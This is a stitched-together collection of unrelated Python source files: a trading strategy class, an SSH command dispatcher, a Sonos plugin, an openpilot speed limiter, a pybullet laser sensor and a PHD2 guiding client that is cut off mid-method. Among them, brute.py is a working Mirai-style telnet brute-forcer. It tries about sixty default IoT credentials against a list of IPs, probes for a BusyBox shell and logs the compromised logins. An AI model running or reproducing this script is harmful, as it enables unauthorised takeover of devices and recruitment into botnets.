def get_open_position_count(self):
"""Check how many positions this strategy has open"""
count = len([p for p in self.positions if p.is_open])
self.add_message(str(count) + " long positions open")
return count
def __update_positions(self):
"""Loop through all positions opened by the strategy"""
for p in self.positions:
if p.is_open:
p.update()
def long(self, order_quantity, fixed_stoploss_percent, trailing_stoploss_percent, profit_target_percent):
"""Open long position"""
if self.is_simulated:
"""Open simulated long position"""
self.add_message("Going long on " + self.market.analysis_pair)
self.positions.append(market_simulator.open_long_position_simulation(self.market, order_quantity,
self.market.latest_candle[
self.interval][3],
fixed_stoploss_percent,
trailing_stoploss_percent,
profit_target_percent))
else:
"""LIVE long position"""
self.add_message("Going long on " + self.market.analysis_pair)
self.positions.append(position.open_long_position(self.market, order_quantity,
self.market.get_best_ask(),
fixed_stoploss_percent,
trailing_stoploss_percent,
profit_target_percent))
def __run(self):
"""Start the strategy thread waiting for commands"""
self.add_message("Starting strategy " + str(self.strategy_id))
self.running = True
while self.running:
if not self.__jobs.empty():
job = self.__jobs.get()
try:
job()
except Exception as e:
print(e)
logger.error(job.__name__ + " threw error:\n" + str(e))
def add_message(self, msg):
"""Add to a queue of messages that can be consumed by the UI"""
print(str("Strategy " + str(self.strategy_id) + ": " + msg))
logger.info(msg)
self.ui_messages.put(msg)
# TODO: Do any clean up involved in shutting down
# NOTE: Stops the strategy and watcher but not the ticker
def stop(self):
market_watcher.stop_watcher(self.market.exchange.id, self.market.base_currency, self.market.quote_currency, self.interval)
self.running = False
|
dispatcher.py
|
from src.util import *
from threading import Thread
from time import sleep
from queue import Queue, Empty
import logging
# logging.basicConfig(filename='clab.log', format='%(asctime)s %(message)s --> ',datefmt='%d/%m/%Y %I:%M:%S %p', filemode='w', level=logging.DEBUG)
def MonitoringThread(in_queue, valid_hosts):
init = datetime.now()
init_time = init.strftime("%H:%M:%S")
while True:
if in_queue.empty():
break
resetTerminal()
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
print("Running Comands from " + init_time + " to " + current_time)
print("Used Hosts: "+ ",".join(valid_hosts))
print("Comands in Queues: {}".format(in_queue.qsize()))
sleep(1)
print(Fore.GREEN + "Done")
def Master(config, host, in_queue, kill_queue):
out_queue = Queue()
cores = config['hosts'][host]['cores']
cores_thread = []
for i in range(cores):
th = Thread(target=coreThread, args=(i, out_queue, kill_queue, config, host))
th.start()
cores_thread.append(th)
while True:
if out_queue.empty():
try:
cmd = in_queue.get(timeout=1)
out_queue.put(cmd)
except Empty:
if in_queue.empty():
kill_queue.put(1)
for th in cores_thread:
th.join()
logging.debug("END subthreads {}".format(host))
break
logging.debug("END Master {}".format(host))
def coreThread(th_id, in_queue, kill_queue, config, host):
while True:
if in_queue.empty():
if not kill_queue.empty():
logging.debug("[{}]-{:02d} | KILL".format(host, th_id))
break
else:
try:
cmd = in_queue.get(timeout=1)
except:
if not kill_queue.empty():
logging.debug("[{}]-{:02d} | KILL".format(host, th_id))
break
else:
continue
logging.debug("[{}]-{:02d} | Running CMD: {}".format(host, th_id, cmd))
sendToHost(config['global']['user'], host, config['global']['ssh_key'], cmd, config['global']['domain'])
class Dispatcher:
def __init__(self, config, args, valid_hosts):
self.config = config
self.args = args
self.valid_hosts = valid_hosts
self.master_threads = {}
self.kill_queue = Queue()
self.all_cmds = self.genCmds()
def dispatchMaster(self):
in_queue = Queue()
host_queues = {}
for cmd in self.all_cmds:
in_queue.put(cmd)
M_th = Thread(target=MonitoringThread, args=(in_queue,self.valid_hosts))
M_th.start()
for host in self.valid_hosts:
th = Thread(target=Master, args=(self.config, host, in_queue, self.kill_queue))
th.start()
host_queues[host] = th
pass
def genCmds(self):
all_cmds = []
with open(self.args.input, "r") as f:
for line in f.readlines():
all_cmds.append(line.strip().replace("\n",""))
return all_cmds
class Args:
pass
if __name__ == "__main__":
config = yaml.load(open("config.yaml", 'r'), Loader=yaml.CLoader)
args = Args()
args.input = "testargs.txt"
D = Dispatcher(config=config, args=args, valid_hosts=list(config['hosts'].keys()))
D.dispatchMaster()
|
brute.py
|
# source from only4skillers.eu
# edited by WP
import threading
import sys, os, re, time, socket
from Queue import *
from sys import stdout
if len(sys.argv) < 4:
print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
sys.exit()
ips = open(sys.argv[1], "r").readlines()
threads = int(sys.argv[2])
output_file = sys.argv[3]
queue = Queue()
queue_count = 0
combo = [ #use as many passwords as ya want(P.S. The more passwords the slower the bruteforce is going to be)
"root:xc3511",
"root:vizxv",
"root:admin",
"admin:admin",
"root:888888",
"root:xmhdipc",
"root:default",
"root:juantech",
"root:123456",
"root:54321",
"support:support",
"root: ",
"admin:password",
"root:root",
"root:12345",
"user:user",
"admin:",
"root:pass",
"admin:admin1234",
"root:1111",
"admin:smcadmin",
"admin:1111",
"root:666666",
"root:password",
"root:1234",
"root:klv123",
"Administrator:admin",
"service:service",
"supervisor:supervisor",
"guest:guest",
"guest:12345",
"guest:12345",
"admin1:password",
"administrator:1234",
"666666:666666",
"888888:888888",
"ubnt:ubnt",
"root:klv1234",
"root:Zte521",
"root:hi3518",
"root:jvbzd",
"root:anko",
"root:zlxx.",
"root:7ujMko0vizxv",
"root:7ujMko0admin",
"root:system",
"root:ikwb",
"root:dreambox",
"root:user",
"root:realtek",
"root:00000000",
"admin:1111111",
"admin:1234",
"admin:12345",
"admin:54321",
"admin:123456",
"admin:7ujMko0admin",
"admin:1234",
"admin:pass",
"admin:meinsm",
"tech:tech"
]
for ip in ips:
queue_count += 1
stdout.write("\r[%d] Added to queue" % queue_count)
stdout.flush()
queue.put(ip)
print "\n"
class router(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
username = ""
password = ""
for passwd in combo:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
tn = socket.socket()
tn.settimeout(8)
tn.connect((self.ip,23))
except Exception:
tn.close()
break
try:
hoho = ''
hoho += readUntil(tn, "ogin:")
if "ogin" in hoho:
tn.send(username + "\n")
time.sleep(2)
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "assword:")
if "assword" in hoho:
tn.send(password + "\n")
time.sleep(2)
else:
pass
except Exception:
tn.close()
try:
prompt = ''
prompt += tn.recv(40960)
if ">" in prompt and "ONT" not in prompt:
try:
tn.send("cat | sh" + "\n")
time.sleep(1)
success = False
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(1)
tn.send("busybox" + "\r\n")
buf = '' # NO FALSE POSSITIVES OVA HERE
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(1)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
try:
success = False
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("shell" + "\n")
time.sleep(0.01)
tn.send("help" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = '' # NO FALSE POSSITIVES OVA HERE
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
else:
tn.close()
if success == True:
try:
os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
print "\033[32m[\033[31m+\033[32m] \033[33mGOT \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
tn.close()
break
except:
tn.close()
tn.close()
except Exception:
tn.close()
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
def worker():
try:
while True:
try:
IP = queue.get()
thread = router(IP)
thread.start()
queue.task_done()
time.sleep(0.2)
except:
pass
except:
pass
for l in xrange(threads):
try:
t = threading.Thread(target=worker)
t.start()
time.sleep(0.01)
except:
pass
|
media_player.py
|
"""Support to interface with Sonos players. Extending Standard Sonos Component for static configuration"""
import pysonos.discovery as pysonosdiscover
import pysonos
import asyncio
import traceback
import threading
import homeassistant.components.sonos.media_player as sonosha
DEPENDENCIES = ('sonos',)
"""
Helper für Überwachung der LazySoCo bis zur Verwendung
"""
class LazySoCoHelper():
def __init__(self):
self._lock = threading.RLock()
self.connectors = []
self.connectors_toinit = []
self.init_thread = None
self.entity_added = threading.Event()
self.zonenames=dict()
def register_zonename(self, zonename, ip):
self.zonenames[ip] = zonename
def get_zonename(self, ip):
if ip in self.zonenames:
return self.zonenames[ip]
return None
def registerSoCo(self, soco):
with self._lock:
self.connectors.append(soco)
self.connectors_toinit.append(soco)
self.entity_added.set()
self.check_initthread_running()
def check_initthread_running(self):
with self._lock:
if not self.connectors_toinit or self.init_thread != None:
return
self.init_thread = threading.Thread(
target=self._initthread, daemon=True)
self.init_thread.start()
def discover(self, callback):
with self._lock:
for soco in self.connectors:
try:
callback(soco)
except Exception as e:
# error on satellite nodes with no element found on calling shufle
pass
def _initthread(self):
asyncio.set_event_loop(asyncio.new_event_loop())
while True:
connectors_toinit = []
with self._lock:
connectors_to_remove = []
for connector in self.connectors_toinit:
if connector.is_lazy_connected():
connectors_to_remove.append(connector)
else:
connectors_toinit.append(connector)
for connector in connectors_to_remove:
self.connectors_toinit.remove(connector)
if not connectors_toinit:
self.init_thread = None
break
self.entity_added.wait(timeout=30)
self.entity_added.clear()
loop = asyncio.get_event_loop()
loop.run_until_complete(
self._initconnectors(connectors_toinit, loop=loop))
loop.close()
async def _initconnectors(self, connectors_toinit, loop=None):
futures = []
for connector in connectors_toinit:
futures.append(connector._initialize(loop))
await asyncio.gather(*futures, loop=loop)
helper = LazySoCoHelper()
SoCo = pysonos.SoCo
class NoneSubscription():
def unsubscribe(self):
pass
class LazyService():
def subscribe(self, requested_timeout=None, auto_renew=False, event_queue=None):
return NoneSubscription()
class LazyZoneGroupTopology(LazyService):
def GetZoneGroupState(self, *args, **kwargs):
return ""
class EmptyMusicLibrary():
def get_sonos_favorites(self):
return []
""" Helper Class for using pysonos lazy with home assistant"""
class LazySoCo(SoCo):
def __init__(self, ip):
self._lazyuid = None
self._inited = False
self._lazyZoneName = helper.get_zonename(ip)
self._ip = ip
super().__init__(ip)
helper.registerSoCo(self)
async def _initialize(self, loop=None):
connection = asyncio.open_connection(host=self._ip, port=1400, loop=loop)
try:
reader, writer = await asyncio.wait_for(connection, 3, loop=loop)
writer.close()
self._inited = True
except (asyncio.TimeoutError, OSError) as e:
return
def is_lazy_connected(self):
return self._inited
@property
def uid(self):
if self._lazyuid is None:
self._lazyuid = "lazy" + self.ip_address
return self._lazyuid
def get_speaker_info(self, refresh=False, timeout=None):
if self._inited:
return super().get_speaker_info(refresh=refresh, timeout=timeout)
info = dict()
info['zone_name'] = self._lazyZoneName
info['model_name'] = "Sonos Lazy Connector"
return info
@property
def shuffle(self):
if self._inited:
return super().shuffle
return False
@shuffle.setter
def shuffle(self, shuffle):
SoCo.shuffle.fset(self, shuffle)
@property
def volume(self):
if self._inited:
return super().volume
return 0
@volume.setter
def volume(self, volume):
SoCo.volume.fset(self, volume)
@property
def mute(self):
if self._inited:
return super().mute
return True
@mute.setter
def mute(self, mute):
SoCo.mute.fset(self, mute)
@property
def night_mode(self):
if self._inited:
return super().night_mode
return None
@property
def dialog_mode(self):
if self._inited:
return super().dialog_mode
return None
@property
def music_library(self):
if self._inited:
return self._music_library
return EmptyMusicLibrary()
@music_library.setter
def music_library(self, music_library):
self._music_library = music_library
music_library.contentDirectory = self._contentDirectory
@property
def avTransport(self):
if self._inited:
return self._avTransport
return LazyService()
@avTransport.setter
def avTransport(self, avTransport):
self._avTransport = avTransport
@property
def renderingControl(self):
if self._inited:
return self._renderingControl
return LazyService()
@renderingControl.setter
def renderingControl(self, renderingControl):
self._renderingControl = renderingControl
# das darf nicht ignoriert werdne bzw. muss dann sehr sauber gewrapped werden.
@property
def zoneGroupTopology(self):
if self._inited:
return self._zoneGroupTopology
return LazyZoneGroupTopology()
@zoneGroupTopology.setter
def zoneGroupTopology(self, zoneGroupTopology):
self._zoneGroupTopology = zoneGroupTopology
@property
def contentDirectory(self):
if self._inited:
return self._contentDirectory
return LazyService()
@contentDirectory.setter
def contentDirectory(self, contentDirectory):
self._contentDirectory = contentDirectory
@property
def group(self):
if self._inited:
return super().group
return None
pysonos.SoCo = LazySoCo
pysonos.config.SOCO_CLASS=LazySoCo
def static_discover_thread(callback,
timeout,
include_invisible,
interface_addr):
global helper
helper.discover(callback)
pysonosdiscover._discover_thread = static_discover_thread
class LazySonosEntity(sonosha.SonosEntity):
def __init__(self, player):
super().__init__(player)
self._available = False
pass
def seen(self):
if not self._player.is_lazy_connected():
self._seen = 0
return
super().seen()
sonosha.SonosEntity = LazySonosEntity
async def async_setup_platform(hass,
config,
async_add_entities,
discovery_info=None):
"""Set up the Sonos platform.
"""
try:
for host in config['hosts']:
helper.register_zonename(host['name'], host['ip'])
LazySoCo(host['ip'])
except Exception as e:
print(traceback.format_exc())
|
road_speed_limiter.py
|
import json
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.params import Params
from common.numpy_fast import interp
current_milli_time = lambda: int(round(time.time() * 1000))
CAMERA_SPEED_FACTOR = 1.05
BROADCAST_PORT = 2899
RECEIVE_PORT = 843
LOCATION_PORT = 2911
class RoadSpeedLimiter:
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.slowing_down = False
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
self.start_dist = 0
self.longcontrol = Params().get_bool('LongControlEnabled')
thread = Thread(target=self.udp_recv_thread, args=[])
thread.setDaemon(True)
thread.start()
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.setDaemon(True)
broadcast.start()
#gps = Thread(target=self.gps_thread, args=[])
#gps.setDaemon(True)
#gps.start()
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps([
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
])
address = (self.remote_addr[0], LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
if current_milli_time() - self.last_updated_active > 1000*10:
self.active = 0
except:
pass
def udp_recv_thread(self):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.bind(('0.0.0.0', RECEIVE_PORT))
while True:
try:
data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = current_milli_time()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = current_milli_time()
finally:
self.lock.release()
except:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
except Exception as e:
self.last_exception = e
def get_limit_val(self, key, default=None):
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
return default
def get_active(self):
if self.active is None:
return 0
return self.active
def get_max_speed(self, CS, v_cruise_kph):
log = ""
if current_milli_time() - self.last_updated > 1000 * 20:
if self.last_exception is not None:
log = str(self.last_exception)
else:
log = "expired: {:d}, {:d}".format(current_milli_time(), self.last_updated)
self.slowing_down = False
return 0, 0, 0, False, log
try:
road_limit_speed = self.get_limit_val('road_limit_speed')
is_highway = self.get_limit_val('is_highway')
cam_type = int(self.get_limit_val('cam_type', 0))
cam_limit_speed_left_dist = self.get_limit_val('cam_limit_speed_left_dist')
cam_limit_speed = self.get_limit_val('cam_limit_speed')
section_limit_speed = self.get_limit_val('section_limit_speed')
# section_avg_speed = self.get_val('section_avg_speed')
section_left_dist = self.get_limit_val('section_left_dist')
# section_left_time = self.get_val('section_left_time')
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
MIN_LIMIT = 30
MAX_LIMIT = 100
else:
MIN_LIMIT = 30
MAX_LIMIT = 120
# log = "RECV: " + str(is_highway)
# log += ", " + str(cam_limit_speed)
# log += ", " + str(cam_limit_speed_left_dist)
# log += ", " + str(section_limit_speed)
# log += ", " + str(section_left_dist)
v_ego = CS.clu11["CF_Clu_Vanz"] / 3.6
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
diff_speed = v_ego * 3.6 - cam_limit_speed
if cam_type == 7:
if self.longcontrol:
sec = interp(diff_speed, [10., 30.], [15., 22.])
else:
sec = interp(diff_speed, [10., 30.], [16., 23.])
else:
if self.longcontrol:
sec = interp(diff_speed, [10., 30.], [12., 18.])
else:
sec = interp(diff_speed, [10., 30.], [13., 20.])
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < v_ego * sec):
if not self.slowing_down:
self.start_dist = cam_limit_speed_left_dist * 1.2
self.slowing_down = True
first_started = True
else:
first_started = False
base = self.start_dist / 1.2 * 0.65
td = self.start_dist - base
d = cam_limit_speed_left_dist - base
if d > 0 and td > 0. and diff_speed > 0 and (section_left_dist is None or section_left_dist < 10):
pp = d / td
else:
pp = 0
return cam_limit_speed * CAMERA_SPEED_FACTOR + int(
pp * diff_speed), cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(CS, v_cruise_kph):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
try:
road_speed_limiter.lock.acquire()
return road_speed_limiter.get_max_speed(CS, v_cruise_kph)
finally:
road_speed_limiter.lock.release()
|
laser.py
|
#!/usr/bin/env python
# coding: utf-8
import time
import math
import pybullet
import threading
from qibullet.sensor import Sensor
RAY_MISS_COLOR = [0, 1, 0]
RAY_HIT_COLOR = [1, 0, 0]
NUM_RAY = 15
RAY_LENGTH = 3.0 # The theoretical length is 5.6, closer to 3.0 in reality
LASER_ANGLE = 60
LASER_POSITION = [
[0.0562, 0, -0.334], # Front laser
[-0.018, -0.0899, -0.334], # Right laser
[-0.018, 0.0899, -0.334] # Left laser
]
ANGLE_LIST_POSITION = [
math.radians(LASER_ANGLE / 2), # Front laser
math.radians(LASER_ANGLE / 2) - 1.75728, # Right laser
math.radians(LASER_ANGLE / 2) + 1.75728 # Left laser
]
NUM_LASER = len(LASER_POSITION)
DEFAULT_FREQUENCY = 6.25
class Laser(Sensor):
"""
Class representing a virtual laser
"""
def __init__(
self,
robot_model,
laser_id,
frequency=DEFAULT_FREQUENCY,
display=False,
physicsClientId=0):
"""
Constructor
Parameters:
robot_model - The pybullet model of the robot.
laser_id - The id of the link (Link type)
onto which the Lasers' are attached.
frequency - The update frequency of the laser in Hz (default
frequency set to 6.25 Hz)
display - boolean that allow the display of the laser
physicsClientId - The id of the simulated instance in which the
lasers are to be spawned
"""
Sensor.__init__(self, robot_model, physicsClientId)
self.ray_from = []
self.ray_to = []
self.ray_ids = []
self.laser_value = [0] * NUM_RAY * NUM_LASER
self.laser_id = laser_id
self.display = display
self.values_lock = threading.Lock()
self.setFrequency(frequency)
def subscribe(self):
"""
Subscribe to the laser scan (this will activate the laser scan
process).
"""
# No need to subscribe to the laser scan if the lasers are activated
if self.isAlive():
return
self._module_termination = False
self._initializeRays()
self.module_process = threading.Thread(target=self._laserScan)
self.module_process.start()
def unsubscribe(self):
"""
Unsubscribe from the laser scan (this will deactivate the laser scan
process)
"""
if self.isAlive():
self._terminateModule()
def showLaser(self, display):
"""
Display debug lines that simulate the laser
"""
self.display = display
def getFrontLaserValue(self):
"""
Return a list of the front laser value (clockwise)
"""
with self.values_lock:
return self.laser_value[:NUM_RAY]
def getRightLaserValue(self):
"""
Return a list of the right laser value (clockwise)
"""
with self.values_lock:
return self.laser_value[NUM_RAY:2*NUM_RAY]
def getLeftLaserValue(self):
"""
Return a list of the left laser value (clockwise)
"""
with self.values_lock:
return self.laser_value[2*NUM_RAY:]
def _initializeRays(self):
"""
INTERNAL METHOD, initialize the laser and all variables needed
"""
for index in range(NUM_LASER):
angle = ANGLE_LIST_POSITION[index]
for i in range(NUM_RAY):
self.ray_from.append([
LASER_POSITION[index][0],
LASER_POSITION[index][1],
LASER_POSITION[index][2]])
self.ray_to.append([
LASER_POSITION[index][0] + (RAY_LENGTH) * math.cos(
float(i) * math.radians(-LASER_ANGLE)/NUM_RAY + angle),
LASER_POSITION[index][1] + (RAY_LENGTH) * math.sin(
float(i) * math.radians(-LASER_ANGLE)/NUM_RAY + angle),
LASER_POSITION[index][2]])
def _laserScan(self):
"""
INTERNAL METHOD, a loop that simulate the laser and update the distance
value of each laser
"""
period = 1.0 / self.getFrequency()
sampling_time = time.time()
while not self._module_termination:
current_time = time.time()
if current_time - sampling_time < period:
continue
results = pybullet.rayTestBatch(
self.ray_from,
self.ray_to,
parentObjectUniqueId=self.getRobotModel(),
parentLinkIndex=self.laser_id,
physicsClientId=self.getPhysicsClientId())
with self.values_lock:
for i in range(NUM_RAY*len(ANGLE_LIST_POSITION)):
hitObjectUid = results[i][0]
hitFraction = results[i][2]
hitPosition = results[i][3]
self.laser_value[i] = hitFraction * RAY_LENGTH
if self.display:
if not self.ray_ids:
self._createDebugLine()
if (hitFraction == 1.):
pybullet.addUserDebugLine(
self.ray_from[i],
self.ray_to[i],
RAY_MISS_COLOR,
replaceItemUniqueId=self.ray_ids[i],
parentObjectUniqueId=self.getRobotModel(),
parentLinkIndex=self.laser_id,
physicsClientId=self.getPhysicsClientId())
else: # pragma: no cover
localHitTo = [
self.ray_from[i][0] + hitFraction * (
self.ray_to[i][0] - self.ray_from[i][0]),
self.ray_from[i][1] + hitFraction * (
self.ray_to[i][1] - self.ray_from[i][1]),
self.ray_from[i][2] + hitFraction * (
self.ray_to[i][2] - self.ray_from[i][2])]
pybullet.addUserDebugLine(
self.ray_from[i],
localHitTo,
RAY_HIT_COLOR,
replaceItemUniqueId=self.ray_ids[i],
parentObjectUniqueId=self.getRobotModel(),
parentLinkIndex=self.laser_id,
physicsClientId=self.getPhysicsClientId())
else:
if self.ray_ids:
self._resetDebugLine()
sampling_time = current_time
def _createDebugLine(self):
"""
INTERNAL METHOD, create all debug lines needed for simulating the
lasers
"""
for i in range(NUM_RAY * NUM_LASER):
self.ray_ids.append(pybullet.addUserDebugLine(
self.ray_from[i],
self.ray_to[i],
RAY_MISS_COLOR,
parentObjectUniqueId=self.getRobotModel(),
parentLinkIndex=self.laser_id,
physicsClientId=self.getPhysicsClientId()))
def _resetDebugLine(self):
"""
INTERNAL METHOD, remove all debug lines
"""
for i in range(len(self.ray_ids)):
pybullet.removeUserDebugItem(
self.ray_ids[i],
physicsClientId=self.getPhysicsClientId())
self.ray_ids = []
|
phd2guider.py
|
# MIT License
# Copyright (c) 2017 Andy Galasso
# https://github.com/agalasso/phd2client/
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
PHD2 guiding module
"""
import copy
import json
import math
import selectors
import socket
import threading
import time
class SettleProgress:
"""Info related to progress of settling after guiding starts or after
a dither
"""
def __init__(self):
self.Done = False
self.Distance = 0.0
self.SettlePx = 0.0
self.Time = 0.0
self.SettleTime = 0.0
self.Status = 0
self.Error = ""
class GuideStats:
"""cumulative guide stats since guiding started and settling
completed
"""
def __init__(self):
self.rms_tot = 0.0
self.rms_ra = 0.0
self.rms_dec = 0.0
self.peak_ra = 0.0
self.peak_dec = 0.0
class GuiderException(Exception):
"""GuiderException is the base class for any excettions raied by the
Guider methods
"""
pass
class _Accum:
def __init__(self):
self.Reset()
def Reset(self):
self.n = 0
self.a = self.q = self.peak = 0
def Add(self, x):
ax = abs(x)
if ax > self.peak:
self.peak = ax
self.n += 1
d = x - self.a
self.a += d / self.n
self.q += (x - self.a) * d
def Mean(self):
return self.a
def Stdev(self):
return math.sqrt(self.q / self.n) if self.n >= 1 else 0.0
def Peak(self):
return self.peak
class _Conn:
def __init__(self):
self.lines = []
self.buf = b""
self.sock = None
self.sel = None
self.terminate = False
def __del__(self):
self.Disconnect()
def Connect(self, hostname, port):
self.sock = socket.socket()
try:
self.sock.connect((hostname, port))
self.sock.setblocking(False) # non-blocking
self.sel = selectors.DefaultSelector()
self.sel.register(self.sock, selectors.EVENT_READ)
except Exception:
self.sel = None
self.sock = None
raise
def Disconnect(self):
if self.sel is not None:
self.sel.unregister(self.sock)
self.sel = None
if self.sock is not None:
self.sock.close()
self.sock = None
def IsConnected(self):
return self.sock is not None
def ReadLine(self):
# print(f"DBG: ReadLine enter lines:{len(self.lines)}")
while not self.lines:
# print("DBG: begin wait")
while True:
if self.terminate:
return ""
events = self.sel.select(0.5)
if events:
break
# print("DBG: call recv")
s = self.sock.recv(4096)
# print(f"DBG: recvd: {len(s)}: {s}")
i0 = 0
i = i0
while i < len(s):
if s[i] == b"\r"[0] or s[i] == b"\n"[0]:
self.buf += s[i0:i]
if self.buf:
self.lines.append(self.buf)
self.buf = b""
i += 1
i0 = i
else:
i += 1
self.buf += s[i0:i]
return self.lines.pop(0)
def WriteLine(self, s):
b = s.encode()
totsent = 0
while totsent < len(b):
sent = self.sock.send(b[totsent:])
if sent == 0:
raise RuntimeError("socket connection broken")
totsent += sent
def Terminate(self):
self.terminate = True
class Guider:
"""The main class for interacting with PHD2"""
DEFAULT_STOPCAPTURE_TIMEOUT = 10
def __init__(self, hostname="localhost", instance=1):
self.hostname = hostname
self.instance = instance
self.conn = None
self.terminate = False
self.worker = None
self.lock = threading.Lock()
self.cond = threading.Condition()
self.response = None
self.AppState = ""
self.AvgDist = 0
self.Version = ""
self.PHDSubver = ""
self.accum_active = False
self.settle_px = 0
self.accum_ra = _Accum()
self.accum_dec = _Accum()
self.Stats = GuideStats()
self.Settle = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.Disconnect()
@staticmethod
def _is_guiding(st):
return st == "Guiding" or st == "LostLock"
@staticmethod
def _accum_get_stats(ra, dec):
stats = GuideStats()
stats.rms_ra = ra.Stdev()
stats.rms_dec = dec.Stdev()
stats.peak_ra = ra.Peak()
stats.peak_dec = dec.Peak()
return stats
def _handle_event(self, ev):
e = ev["Event"]
if e == "AppState":
with self.lock:
self.AppState = ev["State"]
if self._is_guiding(self.AppState):
self.AvgDist = 0 # until we get a GuideStep event
elif e == "Version":
with self.lock:
self.Version = ev["PHDVersion"]
self.PHDSubver = ev["PHDSubver"]
elif e == "StartGuiding":
self.accum_active = True
self.accum_ra.Reset()
self.accum_dec.Reset()
stats = self._accum_get_stats(self.accum_ra, self.accum_dec)
with self.lock:
self.Stats = stats
elif e == "GuideStep":
if self.accum_active:
self.accum_ra.Add(ev["RADistanceRaw"])
self.accum_dec.Add(ev["DECDistanceRaw"])
stats = self._accum_get_stats(self.accum_ra, self.accum_dec)
with self.lock:
self.AppState = "Guiding"
self.AvgDist = ev["AvgDist"]
